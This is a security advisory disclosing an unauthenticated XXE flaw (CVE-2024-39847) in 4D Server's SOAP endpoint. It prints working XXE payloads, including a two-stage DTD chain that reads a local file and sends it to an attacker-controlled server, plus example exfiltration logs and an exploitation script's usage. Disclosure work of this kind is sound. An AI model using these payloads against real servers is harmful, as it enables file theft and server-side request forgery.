📄 4D Server Server-Side Request Forgery / Arbitrary File Read

-----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA512
    
    Arbitrary File Read and Server Side Request Forgery via XML External 
    Entities in 4D Server
    SOAP
    ===============================================================================================
    
    Unauthenticated attackers can exploit a weakness in the XML parser 
    functionality of the
    SOAP endpoints in 4D server. This allows them to obtain read access to 
    files on the
    application server and adjacent network shares, and perform HTTP GET 
    requests to arbitrary
    services.
    
    Metadata
    ========
    
    - - Affected product: 4D Server
    - - Affected version: v20 R3
    - - Vendor: 4D
    - - Problem type(s): CWE-611 Improper Restriction of XML External Entity 
    Reference
    - - CVE ID: CVE-2024-39847
    - - CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-39847
    - - CVSS 4.0 score: 8.7
    - - Advisory URL: https://www.schutzwerk.com/en/blog/schutzwerk-sa-2024-002/
    
    Details
    =======
    
    During a recent external penetration test, an application based on the 
    4D development
    platform[0] was examined. 4D Server is a component of the 4D suite, and 
    acts as the
    database and application server, serving mobile and desktop clients. 
    SCHUTZWERK identified
    an arbitrary file read vulnerability via XML external entities in the 
    SOAP endpoint(s) of
    4D Server.
    
    Sending the following payload to the /4DSOAP endpoint showed that the 
    application
    processes external XML entities, as requests were observed on the attack 
    server:
    
    <!DOCTYPE foo [
     <!ENTITY % test SYSTEM "http://attacker.tld">
     %test;
    ]>
    
    After setting up a local 4D Server instance, SCHUTZWERK was able to 
    confirm that the
    vulnerability is present in the latest version of 4D Server (20 R3 at 
    the time of
    writing). Additionally, SCHUTZWERK found that the vulnerability is 
    exploitable even if
    "Reject SOAP-Requests" is set in the 4D Server GUI.
    
    Further testing revealed that a combination of error-based and 
    out-of-band exfiltration
    techniques can be utilized to read arbitrary files on the application 
    servers' file system
    and adjacent network shares, as well as performing HTTP requests to 
    arbitrary URLs. This
    requires the use of a Document Type Definition (DTD) file loaded from an 
    attacker
    controlled server, and can be demonstrated using the following payloads:
    
    Stage 1: XML body sent to the /4DSOAP endpoint
    
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE foo [
      <!ENTITY % stage1 SYSTEM "http://192.168.56.1:2121/stage.dtd">
      %stage1;
    ]>
    
    Stage 2: DTD file returned by http://192.168.56.1:2121/stage.dtd
    
    <!ENTITY % fileb SYSTEM "file:///c:\Users\john.doe\Desktop\secret.txt">
    <!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM '%fileb;'>">
    %eval;
    %exfiltrate;
    
    Server response for the request sent to the /4DSOAP endpoint:
    
    <?xml version="1.0" encoding="UTF-8" ?>
    <SOAP-ENV:Envelope 
    SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" 
    xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" 
    xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" 
    xmlns:xsd="http://www.w3.org/2001/XMLSchema" 
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
    <SOAP-ENV:Body>
            <SOAP-ENV:Fault>
                    <faultcode>SOAP-ENV:Client</faultcode>
                    <faultstring>error at line 6, column 1: invalid 
    document structure
    </faultstring>
            </SOAP-ENV:Fault>
    </SOAP-ENV:Body>
    </SOAP-ENV:Envelope>
    
    Requests sent to the attacker controlled server (192.168.56.1:2121):
    
    192.168.56.114 - - "GET /stage.dtd HTTP/1.1" 200 -
    192.168.56.114 - - "GET 
    /my%20secret%20message%0D%0Ais%20super%20secret%0D%0Aand%20secure 
    HTTP/1.1" 200 -
    
    Depending on the file contents, HTTP requests for the exfiltrate entity 
    may fail. On the
    local test instance of 4D Server (which was set up by creating a new, 
    empty 4D application
    project), this was the case when requesting files containing a hashtag 
    (#). In this case,
    the file contents are instead returned as part of the /4DSOAP endpoint's 
    response message:
    
    <?xml version="1.0" encoding="UTF-8" ?>
    <SOAP-ENV:Envelope 
    SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" 
    xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" 
    xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" 
    xmlns:xsd="http://www.w3.org/2001/XMLSchema" 
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
    <SOAP-ENV:Body>
            <SOAP-ENV:Fault>
                    <faultcode>SOAP-ENV:Client</faultcode>
                    <faultstring>error at line 5, column 13: unable to open 
    external entity 'http://192.168.56.1:2121/# my secret website
    - - http:/secret.tld/bar'
    </faultstring>
            </SOAP-ENV:Fault>
    </SOAP-ENV:Body>
    </SOAP-ENV:Envelope>
    
    For some file contents, exfiltration using these methods will not 
    succeed. However,
    depending on the application, exfiltration could still be achieved 
    utilizing application
    specific SOAP functions accepting data tags.
    
    The script 4d-xxe.py[1] was developed in order to aid in automated 
    exploitation. It
    utilizes Flask[2] to start an exfiltration server on port 2121, and a 
    query endpoint on
    port 1337. Once started, files can be requested by issuing a GET request to
    
    http://127.0.0.1:1337/<target URI>
    
    which will send the appropriate XML payload to obtain the specified 
    resource:
    
    $ curl '127.0.0.1:1337/http://192.168.56.114'
    <?xml version="1.0" encoding="UTF-8" ?>
    <SOAP-ENV:Envelope 
    SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" 
    xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" 
    xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" 
    xmlns:xsd="http://www.w3.org/2001/XMLSchema" 
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
    <SOAP-ENV:Body>
            <SOAP-ENV:Fault>
                    <faultcode>SOAP-ENV:Client</faultcode>
                    <faultstring>error at line 5, column 13: unable to 
    connect socket for URL 'http://192.168.56.1:2121/<!DOCTYPE HTML PUBLIC 
    "-//W3C//DTD HTML 4.01 Transitional//EN" 
    "http://www.w3.org/TR/html4/loose.dtd">
    
    <html>
    [...]
          <td class="grayborder">
            <h2 align="center">Welcome to your 4D Web Server default home
              page!</h2>
            <p align="center">This is the <strong><b>4D Web Server</b></strong>
              default home page. This <strong>test page</strong> is served 
    by 4D
              Application.</p>
            <p align="center">If you are the webmaster, congratulations! 
    Your Web
              server is up and running. You are seeing this page because 
    you have
              not yet replaced the default "index.html" file with 
    your actual
              home page.</p>
            <p align="center">Instructions for configuring your 4D Web
              Server can be found in the included documentation.</p>
            <p align="center"><b>IMPORTANT</b>: This Web page or Web site 
    is neither
              owned nor administered by 4D SAS or any of its subsidiaries. 
    Please contact
              the owner/webmaster of this site to report any problems with 
    it.</p>
            <p align="center">&copy;1995-2024 4D, Inc., 4D SAS and its 
    Licensors.<br>
              All rights reserved.</p>
           </td>
    [...]
    </html>
    '
    </faultstring>
    </SOAP-ENV:Fault>
    </SOAP-ENV:Body>
    </SOAP-ENV:Envelope>
    
    This enables the use of any web directory enumeration tool to exfiltrate 
    files and/or
    perform "proxied" HTTP requests.
    
    Risk
    ====
    
    An attacker can use the vulnerability to gather information and, 
    depending on the stored
    data, exfiltrate secrets from the file system and adjacent SMB shares. 
    Furthermore, HTTP
    requests can be used for out-of-band exfiltration and server-side 
    request forgery (SSRF)
    attacks. Utilizing the SMB protocol could also lead to leakage of the 
    user's NTLM or SSP
    hash.
    
    Solution/Mitigation
    ===================
    
    Update to 4D Server 20 R7 or higher.
    
    Timeline
    ========
    
    - - 2024-06-17 Vulnerability discovered
    - - 2024-06-24 Attempt to contact vendor, no response received
    - - 2024-06-25 CVE ID requested
    - - 2024-06-29 CVE-2024-39847 assigned
    - - 2024-07-04 Attempt to contact vendor again, no response received
    - - 2024-07-09 Attempt to contact vendor again, no response received
    - - 2024-07-16 Attempt to contact vendor again, no response received
    - - 2024-07-22 Attempt to contact vendor again, no response received
    - - 2026-04-29 Advisory published
    
    Credits
    =======
    
    The vulnerability was discovered by Marcelo Reyes of SCHUTZWERK GmbH.
    
    Footnotes
    =========
    
    [0] https://4d.com
    [1] https://www.schutzwerk.com/blog/schutzwerk-sa-2024-002/4d-xxe.py
    [2] https://flask.palletsprojects.com/en/stable/
    -----BEGIN PGP SIGNATURE-----
    
    iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmnyGKIaHGFkdmlzb3Jp
    ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrs6TQ//Vp4Ts1sg8wUOx5V46ttU
    OkErEUSrMqHDCrxiLKLsYoBBXyqPB+oKLzWFkMTUxbq+W7aqJIVG6EMeBsu1FCae
    0JfGA0MYYJ4s7WcphN/QqqU+e35r0NfPAzcKlr861ZNcwcy9vbg/WP+z1AlTfH9X
    MBKtv4Z2R1xpFq2sAJnwOw3E7Cl5g40PSsTJhI52/O7M4K5rB14EjFXW/hHgSFNz
    ESUI+o/U1t7nPDulxfSsVmvbDTuvmxrs1xM/ulMYoKFKSueEglNCmF+5i/lFs7LF
    rM0PZLGCbMR9z2NOeEk+dGwCztXpY2KN1KvPWYt4flvxZzlnWFWCzrVog8QdDhbV
    CAfeLi+5krzgsZIPfphYpHc2BYJdAGsHDZx76GxoMNi8/miHX15+vg3N7SBPopOG
    aIWnPJX0LCoecdzELJhzpOSYpzLTurRKnPU6y4sa/gJN4K99gCbE2HpPIJRaJmJG
    hk7iwTUA11ijiEWpKCWX3hE3dhxY9WgKKoKe/CtGZkaEoEa1ePTPUFWhiwORpSsa
    AV3i7YZOgjBiEj4ffBfy+Z/3fHhR7S3fWpFUhWeyb2jjx6OuJSG4g9az6Uze0hZG
    vYn40CIpG2sHlm1PzQBzMUopqjmaW+FMyLgv8XOsnfdqg7UqPJ0LKmNAtafO1tVo
    HH0qazSkyWNwZlaLr5YYUso=
    =MhKk
    -----END PGP SIGNATURE-----
    
    
    -- 
    SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany
    Zertifiziert / Certified ISO 27001, 9001 and TISAX
    
    Phone +49 731 977 191 0
    
    [email protected] / www.schutzwerk.com
    
    Geschäftsführer / Managing Directors:
    Jakob Pietzka, Michael Schäfer
    
    Amtsgericht Ulm /  HRB 727391
    Datenschutz / Data Protection www.schutzwerk.com/datenschutz